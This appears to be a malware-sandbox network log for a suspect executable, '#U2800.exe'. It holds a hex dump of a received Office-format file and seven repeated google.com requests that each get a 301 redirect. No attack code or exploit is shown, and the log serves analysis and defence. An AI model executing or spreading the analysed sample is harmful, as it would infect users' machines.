                                                                                                                                                                                                        2025-01-14 11:40:01 UTC941INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 32 91 6f 57 66 01 00 00 a5 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: PK!2oWf[Content_Types].xml (
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: 1e 91 1a b7 ef 00 00 00 4e 02 00 00 0b 00 08 02 5f 72 65 6c 73 2f 2e 72 65 6c 73 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: N_rels/.rels (
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: 7b b7 75 af 8f 48 74 8e 90 55 1b e7 ae c3 28 be 6e 32 f7 31 cd c1 eb a6 e1 f0 dd 22 13 92 ce 12 98 11 98 1a 01 6b 21 7a 05 f0 7f 50 3a 3c e8 53 f6 a4 db 71 ad f1 24 2a 09 7a ad d6 2d f0 b4 99 88 56 78 cc a1 c3 19 e6 54 d2 77 a0 e6 6e 10 04 8e e1 fb 2d dd 0a 51 4e 61 ab 31 f0 8d 41 df 1f 41 eb 10 38 61 74 07 4d c6 c0 70 ad ae bd 69 9a ca 17 1a 7d 36 a7 65 a2 0e 7b a6 3b 4d 7a 16 53 89 07 59 1d 8a 3f e0 b6 25 85 b0 e2 38 ad 4e d5 e2 15 fb 6d 9d fa ee ce 76 f0 8b 53 d9 11 3b d3 a2 66 5e 51 8b 6c fe 90 c7 a1 ba 9d 8a 82 63 c4 19 62 ab aa fa 1a 3d f6 c8 07 a1 b6 0c 8b 9c 86 b0 b8 b9 64 05 93 4b d6 ba 25 df e5 a9 3e 5f 70 45 93 6f fd f0 db f7 c0 8e 98 02 15 27 ef 69 46 17 4c 92 ab 3b 96 0a c5 de 7c db 27 cf 64 7d 79 06 fd b9 63 b9 90 aa 20 4a 7c 27 0d f2 62 ce
                                                                                                                                                                                                        Data Ascii: {uHtU(n21"k!zP:<Sq$*z-VxTwn-QNa1AA8atMpi}6e{;MzSY?%8NmvS;f^Qlcb=dK%>_pEo'iFL;|'d}yc J|'b
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: 18 cc 0f c8 85 fc 7b 01 06 b8 90 0c d3 43 b2 f9 5e 8c df d8 d2 b4 c4 ef 69 9a 61 b4 21 22 d4 85 ec 51 94 f2 8c 6b 16 a2 49 be 40 ae 5a 11 8d 39 67 49 d4 8c 5d f4 26 7e 7f 3c 38 7b 4c 3c 0b b4 23 85 94 1d 38 7f 97 ac 18 95 3a 9b 62 4f 39 93 58 e7 d2 38 6f 1c 62 bb 62 1a 56 7d 23 74 51 e8 dc 54 70 a5 48 58 13 38 5d 27 b0 ec f1 c4 7d 85 70 26 00 e4 1d cb 80 b6 b2 68 0a b8 8c 25 a3 0f 5a 32 44 9b 3d 50 f7 e9 1a a8 a5 2e 19 6d 1a 58 b6 e4 52 64 da fa 9b 60 da 75 2d db ea 99 17 5f 98 3d 49 45 7d c6 72 f2 90 89 c7 84 01 6f 41 05 ad 8b dc 3b b1 fa 4a d7 b5 ef 83 f7 f0 5f 55 ef 7e 5f d5 bb 03 c8 45 92 ad af 68 94 e2 9b fe c8 30 26 ee c5 e7 69 27 a1 79 0f 81 56 7f 82 ae ea 4c 80 54 f1 00 f1 b8 a2 39 c8 13 69 b5 31 19 93 f9 94 3e 00 e5 a1 8a 5e 47 12 ab 2d e0 7d 43
                                                                                                                                                                                                        Data Ascii: {C^ia!"QkI@Z9gI]&~<8{L<#8:bO9X8obbV}#tQTpHX8]'}p&h%Z2D=P.mXRd`u-_=IE}roA;J_U~_Eh0&i'yVLT9i1>^G-}C
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: 02 1c f5 5c 7d 16 b3 de ec 75 89 2e 6c 7c 21 38 5b 73 10 cb 98 10 14 66 f1 02 70 94 bf 66 36 c7 f0 1c 93 a1 b1 86 0a 59 aa 09 c7 d9 9a 83 78 8a 09 f1 85 e5 fb 9f 93 9c 98 27 10 7e f5 db f2 1f 00 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b6 f4 67 98 d2 06 00 00 c9 20 00 00 15 00 00 00 77 6f 72 64 2f 74 68 65 6d 65 2f 74 68 65 6d 65 31 2e 78 6d 6c ec 59 4b 8b 1b 47 10 be 07 f2 1f 86 b9 cb 7a cd e8 61 ac 35 d2 48 f2 6b d7 36 de b5 83 8f bd 52 6b a6 ad 9e 69 d1 dd da b5 30 86 60 9f 72 09 04 9c 90 43 0c b9 e5 10 42 0c 31 c4 e4 92 1f 63 b0 49 9c 1f 91 ea 1e 49 33 2d f5 c4 8f 5d 83 09 bb 82 55 3f be aa fe ba aa ba ba 34 73 e1 e2 fd 98 3a 47 98 0b c2 92 8e 5b 3d 57 71 1d 9c 8c d8 98 24 61 c7 bd 7d 30 2c b5 5c 47 48 94 8c 11 65 09 ee b8 0b 2c dc
                                                                                                                                                                                                        Data Ascii: \}u.l|!8[sfpf6Yx'~PK!g word/theme/theme1.xmlYKGza5Hk6Rki0`rCB1cII3-]U?4s:G[=Wq$a}0,\GHe,
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: 6e 10 d2 63 e5 a7 54 7e e5 dd 53 f7 74 91 31 cd 6d d7 2c db 6b 2b ae a7 e3 69 83 44 2e dc 4c 12 b9 30 8c e0 f2 d8 1c 3e 65 5f b7 33 97 1a f4 94 29 b6 69 34 5b 1f c3 d7 2a 89 6c e4 06 9a 98 3d e7 18 ce 5c dd 07 35 23 34 eb b8 13 f8 c9 04 cd 78 06 fa 84 ca 54 88 86 49 c7 1d c9 a5 a1 3f 24 b3 cc b8 90 7d 24 a2 14 a6 a7 d2 fd c7 44 62 ee 50 12 43 ac e7 dd 40 93 8c 5b b5 d6 54 7b fc 44 c9 b5 2b 9f 9e e5 f4 57 de c9 78 32 c1 23 59 30 92 75 61 2e 55 62 9d 3d 21 58 75 d8 1c 48 ef 47 e3 63 e7 90 ce f9 2d 04 86 f2 9b 55 65 c0 31 11 72 6d cd 31 e1 b9 e0 ce ac b8 91 ae 96 47 d1 78 df 92 1d 51 44 67 11 5a de 28 f9 64 9e c2 75 7b 4d 27 b7 0f cd 74 73 57 66 7f b9 99 c3 50 39 e9 c4 b7 ee db 85 d4 44 2e 69 16 5c 20 ea d6 b4 e7 8f 8f 77 c9 e7 58 65 79 df 60 95 a6 ee cd 5c
                                                                                                                                                                                                        Data Ascii: ncT~St1m,k+iD.L0>e_3)i4[*l=\5#4xTI?$}$DbPC@[T{D+Wx2#Y0ua.Ub=!XuHGc-Ue1rm1GxQDgZ(du{M'tsWfP9D.i\ wXey`\
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: cf 2e d5 70 f8 f6 d2 df a3 ae 15 62 de ff b2 6a 8b 8c ca 95 29 10 bc 44 55 d5 d4 59 b6 09 26 1e 25 9b 52 07 a6 34 34 bc 15 f0 0d 68 5f b2 4d d8 62 a1 c5 c2 06 b3 2f 28 37 3b 03 ed 76 d1 c9 42 27 3b d2 8b 9c 2c ea 64 b1 93 c5 9d 2c 71 b2 a4 93 0d 9d 6c 68 64 25 74 16 49 09 7f 84 92 77 4b 23 5f 0b 4a c5 0e 17 b7 1d fe 42 d4 24 41 95 a8 c2 f3 66 1a 41 79 89 46 d0 8e 27 d5 db a6 f8 09 e6 16 2e 88 86 4f eb 8a 14 0c 3d 99 31 16 0e 8d 79 ab 0d 13 45 d4 fa 44 d7 60 46 b9 3a 65 30 83 be bd e4 fe 89 b1 2d f1 6f 62 31 53 32 27 50 8e ab 3d cb ba a1 f3 47 13 38 25 0a 1a 44 05 f3 49 0b 79 8a 05 71 5a 88 fc ce 0c e7 b8 91 27 71 18 5f 8f c6 b3 06 4e ec 5c d3 b6 87 c0 b9 7f c6 eb 29 52 b8 68 31 67 9a 34 a6 5f e3 69 12 8d 82 70 d4 bf 09 a2 69 3f 8e e2 b0 7f 39 1b 87 fd c5
                                                                                                                                                                                                        Data Ascii: .pbj)DUY&%R44h_Mb/(7;vB';,d,qlhd%tIwK#_JB$AfAyF'.O=1yED`F:e0-ob1S2'P=G8%DIyqZ'q_N\)Rh1g4_ipi?9
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC1369INData Raw: f9 70 1f 66 b6 b1 5c 8a ae 11 43 00 20 04 20 04 20 a4 83 ad 00 21 00 21 c2 52 80 10 80 10 80 10 80 10 80 10 80 90 cf 08 21 ec 48 d0 1b 42 0c cb 71 91 b1 78 a8 22 ea 0f 21 96 63 ce cc 07 04 10 02 10 02 10 32 cc 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 7f f5 86 10 53 5f d8 aa 3b 9f 57 11 f5 87 90 e5 72 a1 2c dd b9 2e ba 46 0c 01 80 10 80 10 80 90 0e b6 02 84 00 84 08 4b 01 42 00 42 00 42 00 42 00 42 00 42 3e 23 84 b0 c5 b6 3f 84 58 1a 52 94 85 53 45 d4 1f 42 e6 68 b1 b4 10 32 45 d7 88 21 00 10 02 10 02 10 d2 c1 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 32 f4 87 10 db b4 35 07 59 55 44 fd 21 64 36 77 6d 57 59 ea a2 6b c4 10 00 08 01 08 01 08 e9 60 2b 40 08 40 88 b0 14 20 04 20 04 20 04 20 04 20 04 20 e4
                                                                                                                                                                                                        Data Ascii: pf\C !!R!HBqx"!c2Va)@@@@@@gS_;Wr,.FKBBBBBB>#?XRSEBh2E!Va)@@@@@@g25YUD!d6wmWYk`+@@


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.449739142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-hDkkQdl1IoeqAOXX0D17nQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.449733142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-OH8DxaBfAkXRxBLqd_HV9g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.449737142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Xob7txJY3dxQ_h2mO_JS9w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        4192.168.2.449736142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-U-KapRCtNk-l2oqYmsebbg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.2.449738142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-K43c7w9867ga69oY5GQ5OQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.2.449741142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-8fZAK2NdANQzjFe0dWt2cw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.2.449734142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-hCFngZ7NGWhGTsPBpxdZAg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
